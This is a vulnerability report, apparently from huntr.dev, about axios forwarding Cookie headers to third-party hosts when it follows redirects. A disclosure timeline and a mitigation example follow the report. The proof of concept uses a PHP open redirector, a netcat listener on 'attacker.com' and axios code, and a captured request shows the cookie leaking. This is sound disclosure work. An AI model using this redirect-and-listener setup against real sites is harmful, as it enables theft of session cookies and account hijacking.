Exposure of Sensitive Information to an Unauthorized Actor in axios/axios


Reported on

Jan 5th 2022


Cookie header leaked to a third-party site, which allows hijacking the victim's account


When fetching a remote URL with a Cookie header, if the response carries a Location header then axios follows that URL and fetches it with the provided cookie. So the cookie is leaked here to a third party.
Ex: you fetch example.com with a cookie, and if it returns a redirect to attacker.com then axios fetches that redirect URL with the provided cookie.
So the cookie of example.com is leaked to attacker.com.
Cookies are the standard way to authenticate to a web app, and you should not leak them to another site.
All browsers follow the same-origin policy, so when a redirect happens the browser does not send the cookie of example.com to attacker.com.


If you fetch http://mysite.com/redirect.php?url=http://attacker.com:8182/ then it redirects to http://attacker.com:8182/.

First set up a web server hosting redirect.php and a netcat listener.

redirect.php on http://mysite.com (an open redirector used only to produce the Location header for this test):

<?php
$url = $_GET['url'];
header("Location: $url");
/* Make sure that code below does not get executed when we redirect. */
exit;

netcat listener on http://attacker.com:

nc -lnvp 8182


Run the axios code below:

const axios = require('axios');

// Request the redirecting URL with a Cookie header (URL from the description
// above, cookie value as seen in the captured request below).
axios.get('http://mysite.com/redirect.php?url=http://attacker.com:8182/yy', {
  headers: { Cookie: 'dfdd=df' }
})
  .then(function (response) {
    // handle success
    console.log(response.status);
  })
  .catch(function (error) {
    // handle error
    console.error(error.message);
  })
  .then(function () {
    // always executed
  });

Request received by the netcat listener on attacker.com:

Connection from 36724 received!
GET /yy HTTP/1.1
Accept: application/json, text/plain, */*
Cookie: dfdd=df
User-Agent: axios/0.24.0
Host: localhost:8182
Connection: close

So here I provided a cookie for mysite.com, but due to the redirect it leaks to the third-party site attacker.com.


If the domain of the provided URL and the domain of the redirect URL are the same, then you can send the Cookie/Authorization header to the redirected URL. But if the two domains are not the same, then the redirect target is a third-party site, so you do not need to send the Cookie/Authorization header.
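The mitigation described above, written out as an added example (this is not code from the report, from axios or from follow-redirects): credential-bearing headers are carried to the next hop only when the redirect target shares the current URL's origin (scheme, host and port). The function names, the constructed response table and the header list are this example's own assumptions; the redirect follower is a minimal offline simulation so the hop-by-hop decision can be inspected without a network.

```javascript
// Added example (not from the report, axios or follow-redirects): drop
// Cookie/Authorization when a redirect leaves the current origin.
// sameOrigin, headersForRedirect and followRedirects are names chosen here.
const SENSITIVE_HEADERS = ['cookie', 'authorization'];

// Two URLs share an origin when scheme, host and port all match
// (the WHATWG URL class already normalises default ports to '').
function sameOrigin(fromUrl, toUrl) {
  const a = new URL(fromUrl);
  const b = new URL(toUrl);
  return a.protocol === b.protocol && a.hostname === b.hostname && a.port === b.port;
}

// Headers for the next hop: all of them if the origin is unchanged, otherwise
// all except the sensitive ones (header names are case-insensitive in HTTP).
function headersForRedirect(fromUrl, toUrl, headers) {
  if (sameOrigin(fromUrl, toUrl)) return { ...headers };
  const kept = {};
  for (const [name, value] of Object.entries(headers)) {
    if (!SENSITIVE_HEADERS.includes(name.toLowerCase())) kept[name] = value;
  }
  return kept;
}

// Minimal redirect follower over a table of constructed responses
// ({ status, location }). Returns the hops that would be sent: { url, headers }.
function followRedirects(startUrl, headers, responses, maxRedirects = 5) {
  let url = startUrl;
  let hopHeaders = { ...headers };
  const trace = [];
  for (let hop = 0; hop <= maxRedirects; hop++) {
    trace.push({ url, headers: { ...hopHeaders } });
    const resp = responses[url];
    if (!resp) throw new Error(`no constructed response for ${url}`);
    const isRedirect = resp.status >= 300 && resp.status < 400 && Boolean(resp.location);
    if (!isRedirect) return trace;
    // Resolve relative Location values against the current URL, as a client would.
    const next = new URL(resp.location, url).toString();
    // Decide per hop, so a cross-origin hop strips the headers for all later hops too.
    hopHeaders = headersForRedirect(url, next, hopHeaders);
    url = next;
  }
  throw new Error(`more than ${maxRedirects} redirects`);
}

// Constructed responses modelled on the report: mysite.com redirects to a
// different origin in one case and to a path on itself in the other.
const CONSTRUCTED_RESPONSES = {
  'http://mysite.com/redirect.php?url=http://attacker.com:8182/yy':
    { status: 302, location: 'http://attacker.com:8182/yy' },
  'http://attacker.com:8182/yy': { status: 200 },
  'http://mysite.com/login': { status: 302, location: '/dashboard' },
  'http://mysite.com/dashboard': { status: 200 },
};

// Demo: the cross-origin hop is sent without the Cookie header.
const demoHops = followRedirects(
  'http://mysite.com/redirect.php?url=http://attacker.com:8182/yy',
  { Cookie: 'dfdd=df', Accept: 'application/json' },
  CONSTRUCTED_RESPONSES
);
for (const h of demoHops) console.log(h.url, JSON.stringify(h.headers));
```

The same check can be applied inside whatever layer actually follows redirects (an HTTP client wrapper or a redirect hook), comparing the URL of the hop just answered with the resolved Location value rather than only the very first URL, so that a chain that leaves the origin and later returns does not regain the credentials.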

We are processing your report and will contact the axios team within 24 hours. 5 months ago
We have contacted a member of the axios team and are waiting to hear back 5 months ago
We have sent a follow up to the axios team. We will try again in 7 days. 5 months ago
5 months ago


Thanks, I can see how this would be an issue. I will get back to you soon with a fix.

5 months ago


Thanks for the reply. Here is another similar report, https://huntr.dev/bounties/fc524e4b-ebb6-427d-ab67-a64181020406/, against another repo. The maintainer fixed the bug by checking the current domain against the redirected domain.
If the current URL's domain is the same as the redirected URL's domain then there is no problem. But if the current domain and the redirect domain are different, then there is no need to send the current domain's cookie to the redirect domain, which prevents this cookie leak.

ranjit-git modified the report
5 months ago
4 months ago


Hi, I just saw that axios uses follow-redirects, which was vulnerable to this attack: https://github.com/follow-redirects/follow-redirects/issues/183#issuecomment-1012265743

We have sent a second follow up to the axios team. We will try again in 10 days. 4 months ago
We have sent a third and final follow up to the axios team. This report is now considered stale. 4 months ago
2 months ago


any update?

Jay validated this vulnerability 2 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the axios team. We will try again in 7 days. 2 months ago
We have sent a second fix follow up to the axios team. We will try again in 10 days. a month ago
We have sent a third and final fix follow up to the axios team. This report is now considered stale. a month ago
Pavlos Moros
a month ago


@maintainer could you please mark this vulnerability as fixed? :)

Jay confirmed that a fix has been merged on c9aca7 a month ago
The fix bounty has been dropped
Jamie Slome
24 days ago


The CVE has been revoked here due to the following discussion.
